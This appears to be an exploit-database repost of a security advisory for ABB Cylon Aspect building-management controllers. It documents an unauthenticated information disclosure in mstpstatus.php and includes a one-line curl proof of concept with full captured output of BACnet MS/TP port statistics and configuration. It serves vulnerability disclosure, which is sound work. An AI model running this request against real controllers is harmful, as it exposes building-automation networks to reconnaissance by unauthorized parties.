[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ABB Cylon Aspect 3.08.01 mstpstatus.php Information Disclosure Vulnerability

Author
LiquidWorm
Risk
[
Security Risk Low
]
0day-ID
0day-ID-39824
Category
web applications
Date add
03-12-2024
Platform
php
ABB Cylon Aspect 3.08.01 (mstpstatus.php) Information Disclosure


Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.01

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an unauthenticated information
disclosure vulnerability. An unauthorized attacker can reference the affected
page and disclose various BACnet MS/TP statistics running on the device.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5865
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5865.php


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ 


$ curl http://192.168.73.31/mstpstatus.php
Thu Nov 28 10:13:51 UTC 2024<br><div id='Port 0Stat' class='portStats'><div id='Port 0Load'>Port 0 Load: 123    Average time (ms) to wait for token return
47      Average time (ms) to wait for for a reply
20      Max info frames
1063    Estimated time for max_nfo_frmaes tx plus token cycle (ms)
18      Estimated max rate (trasactions per sec)
38      congestion threashold
%</div><div id='Port 0BPSTotal'>Port 0 BPS (Total): </div><div id='Port 0BPSOurs'>Port 0 BPS (Mine): </div></div><div id='Port 1Stat' class='portStats'><div id='Port 1Load'>Port 1 Load: 34    Average time (ms) to wait for token return
40      Average time (ms) to wait for for a reply
20      Max info frames
834     Estimated time for max_nfo_frmaes tx plus token cycle (ms)
23      Estimated max rate (trasactions per sec)
48      congestion threashold
%</div><div id='Port 1BPSTotal'>Port 1 BPS (Total): </div><div id='Port 1BPSOurs'>Port 1 BPS (Mine): </div></div><br />
$Id: mstp.ko R_03_05_01 Thu Sep 23 09:30:32 EDT 2021 $ <br />
Proto:          0<br />
<br />
Port 0 Statistics =======================<br />
Baud Rate:        38400<br />
RX Characters:     60521<br />
RX echoes:         0<br />
RX Errors:         31<br />
TX Characters:     49671<br />
Echo detect fails: 0<br />
<br />
Port 0 MSTP State =======================<br />
ValidRXFrameCnt:   42320<br />
InvdRXFrameCnt:    61<br />
rxDataFrames:      16558<br />
rxToken:           29242<br />
TXFrameCnt:        2072<br />
TXQueCnt:          1<br />
CongestionCnt:     0<br />
Poll_Station:      0<br />
SoleMaster:        FALSE<br />
<br />
Port 0 config =======================<br />
Nmax_master:       127<br />
Nmax_info_frames:  20<br />
This_Station:      0<br />
Tno_token:         500<br />
Tusage timeout     30<br />
congestion (auto): 38<br />
Npoll:             50<br />
<br />
<br />
Port 1 Statistics =======================<br />
Baud Rate:        38400<br />
RX Characters:     0<br />
RX echoes:         0<br />
RX Errors:         0<br />
TX Characters:     33632<br />
Echo detect fails: 0<br />
<br />
Port 1 MSTP State =======================<br />
ValidRXFrameCnt:   0<br />
InvdRXFrameCnt:    0<br />
rxDataFrames:      0<br />
rxToken:           0<br />
TXFrameCnt:        2<br />
TXQueCnt:          0<br />
CongestionCnt:     0<br />
Poll_Station:      29<br />
SoleMaster:        TRUE<br />
<br />
Port 1 config =======================<br />
Nmax_master:       127<br />
Nmax_info_frames:  20<br />
This_Station:      0<br />
Tno_token:         500<br />
Tusage timeout     30<br />
congestion (auto): 48<br />
Npoll:             50<br />
<br />

#  0day.today [2024-12-23]  #